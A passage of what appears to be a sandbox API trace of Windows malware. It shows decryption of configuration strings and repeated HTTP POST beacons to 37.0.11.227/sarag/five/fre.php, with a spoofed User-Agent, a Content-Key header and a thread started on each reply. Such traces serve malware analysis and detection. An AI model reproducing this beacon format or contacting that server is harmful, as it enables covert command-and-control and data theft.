returned 0x690000 [0224.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0224.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.676] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0224.677] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.677] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0224.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.678] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0224.678] GetProcessHeap () returned 0x690000 [0224.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0224.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.680] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0224.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.681] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0224.681] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.682] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0224.682] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.682] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0224.683] GetProcessHeap () returned 0x690000 [0224.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0224.683] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0224.683] GetProcessHeap () returned 0x690000 [0224.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0224.683] socket (af=2, type=1, protocol=6) returned 0x5a4 [0224.683] connect (s=0x5a4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0224.728] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0224.728] GetProcessHeap () returned 0x690000 [0224.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0224.728] GetProcessHeap () returned 0x690000 [0224.728] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0224.729] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.731] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.731] GetProcessHeap () returned 0x690000 [0224.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0224.731] GetProcessHeap () returned 0x690000 [0224.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.731] GetProcessHeap () returned 0x690000 [0224.731] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0224.731] GetProcessHeap () returned 0x690000 [0224.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0224.735] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.737] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.737] GetProcessHeap () returned 0x690000 [0224.737] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0224.737] GetProcessHeap () returned 0x690000 [0224.738] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.738] send (s=0x5a4, buf=0x6ad508*, len=242, flags=0) returned 242 [0224.739] send (s=0x5a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0224.739] GetProcessHeap () returned 0x690000 [0224.739] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0224.739] recv (in: s=0x5a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0224.864] GetProcessHeap () returned 0x690000 [0224.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0224.870] GetProcessHeap () returned 0x690000 [0224.871] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0224.871] GetProcessHeap () returned 0x690000 [0224.871] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0224.871] GetProcessHeap () returned 0x690000 [0224.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0224.872] closesocket (s=0x5a4) returned 0 [0224.873] GetProcessHeap () returned 0x690000 [0224.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0224.873] GetProcessHeap () returned 0x690000 [0224.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0224.874] GetProcessHeap () returned 0x690000 [0224.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0224.874] GetProcessHeap () returned 0x690000 [0224.874] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0224.879] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe60) returned 0x5a4 [0224.941] Sleep (dwMilliseconds=0xea60) [0224.945] GetProcessHeap () returned 0x690000 [0224.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0224.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.951] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.000] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0225.014] GetProcessHeap () returned 0x690000 [0225.014] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0225.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.015] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0225.050] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.050] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.075] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.075] GetProcessHeap () returned 0x690000 [0225.076] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0225.077] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.292] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0225.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.296] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0225.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.304] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0225.305] GetProcessHeap () returned 0x690000 [0225.305] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0225.308] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.309] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.328] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.332] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.340] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.340] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.340] GetProcessHeap () returned 0x690000 [0225.341] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0225.341] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0225.342] GetProcessHeap () returned 0x690000 [0225.343] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0225.343] GetProcessHeap () returned 0x690000 [0225.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0225.344] GetProcessHeap () returned 0x690000 [0225.344] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0225.344] GetProcessHeap () returned 0x690000 [0225.344] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0225.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.385] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0225.429] GetProcessHeap () returned 0x690000 [0225.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0225.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.445] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0225.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.448] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.451] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.451] GetProcessHeap () returned 0x690000 [0225.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0225.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.467] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0225.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.469] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0225.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.470] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0225.470] GetProcessHeap () returned 0x690000 [0225.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0225.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.472] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0225.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.473] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0225.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.505] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0225.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.507] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0225.507] GetProcessHeap () returned 0x690000 [0225.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0225.507] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0225.507] GetProcessHeap () returned 0x690000 [0225.507] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab460 [0225.507] socket (af=2, type=1, protocol=6) returned 0x5a8 [0225.540] connect (s=0x5a8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0225.572] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0225.572] GetProcessHeap () returned 0x690000 [0225.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0225.572] GetProcessHeap () returned 0x690000 [0225.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0225.573] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0225.575] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0225.575] GetProcessHeap () returned 0x690000 [0225.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0225.575] GetProcessHeap () returned 0x690000 [0225.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0225.576] GetProcessHeap () returned 0x690000 [0225.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0225.576] GetProcessHeap () returned 0x690000 [0225.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0225.577] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0225.578] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0225.578] GetProcessHeap () returned 0x690000 [0225.578] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0225.578] GetProcessHeap () returned 0x690000 [0225.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0225.584] send (s=0x5a8, buf=0x6ad508*, len=242, flags=0) returned 242 [0225.585] send (s=0x5a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0225.585] GetProcessHeap () returned 0x690000 [0225.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0225.585] recv (in: s=0x5a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0225.730] GetProcessHeap () returned 0x690000 [0225.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0225.731] GetProcessHeap () returned 0x690000 [0225.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0225.731] GetProcessHeap () returned 0x690000 [0225.731] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0225.732] GetProcessHeap () returned 0x690000 [0225.732] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0225.732] closesocket (s=0x5a8) returned 0 [0225.735] GetProcessHeap () returned 0x690000 [0225.735] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0225.735] GetProcessHeap () returned 0x690000 [0225.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0225.736] GetProcessHeap () returned 0x690000 [0225.736] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0225.736] GetProcessHeap () returned 0x690000 [0225.737] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0225.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x61c) returned 0x5a8 [0225.743] Sleep (dwMilliseconds=0xea60) [0225.768] GetProcessHeap () returned 0x690000 [0225.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0225.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.769] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.831] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.832] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0225.845] GetProcessHeap () returned 0x690000 [0225.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0225.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.846] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0225.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.864] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.866] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.867] GetProcessHeap () returned 0x690000 [0225.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0225.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.874] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0225.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.876] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0225.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.879] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0225.879] GetProcessHeap () returned 0x690000 [0225.879] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0225.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.885] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0225.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.887] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0225.888] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.889] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0225.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.892] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0225.892] GetProcessHeap () returned 0x690000 [0225.892] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0225.892] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0225.892] GetProcessHeap () returned 0x690000 [0225.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0225.893] GetProcessHeap () returned 0x690000 [0225.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0225.894] GetProcessHeap () returned 0x690000 [0225.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0225.895] GetProcessHeap () returned 0x690000 [0225.895] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0225.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.897] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0225.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.910] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0225.923] GetProcessHeap () returned 0x690000 [0225.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0225.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.928] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0225.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.929] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0225.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.931] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0225.931] GetProcessHeap () returned 0x690000 [0225.931] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0225.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.933] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0225.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.934] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0225.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0225.935] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0225.935] GetProcessHeap () returned 0x690000 [0225.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0225.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.938] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0225.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.939] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0225.940] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0225.940] StrStrA 